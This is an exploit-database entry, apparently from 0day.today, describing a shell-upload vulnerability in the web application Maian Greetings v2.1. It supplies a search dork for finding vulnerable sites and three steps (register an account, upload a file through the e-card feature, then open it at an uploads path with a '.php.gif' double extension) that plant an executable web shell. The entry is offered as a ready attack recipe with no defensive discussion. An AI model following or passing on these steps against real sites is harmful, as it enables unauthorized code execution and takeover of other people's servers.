id: 10744
date: 01/31/2010
title: Maian Greetings v2.1 Shell Upload Vulnerability
author: indoushka
cves: 

===============================================
Maian Greetings v2.1 Shell Upload Vulnerability
===============================================

| # Dork     : Powered by Maian Greetings v2.1                                        
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Shell Upload    
# Exploit  :
  
 1- (First Create Account) http://127.0.0.1/greetings/index.php?cmd=account
  
 2- (Second Upload your file) http://127.0.0.1/greetings/index.php?cmd=ecard&random=1
  
 3- (Third Find It in) http://127.0.0.1/greetings/images/uploads/user1_1264680573.php.gif

        

#  0day.today [2023-03-24]  #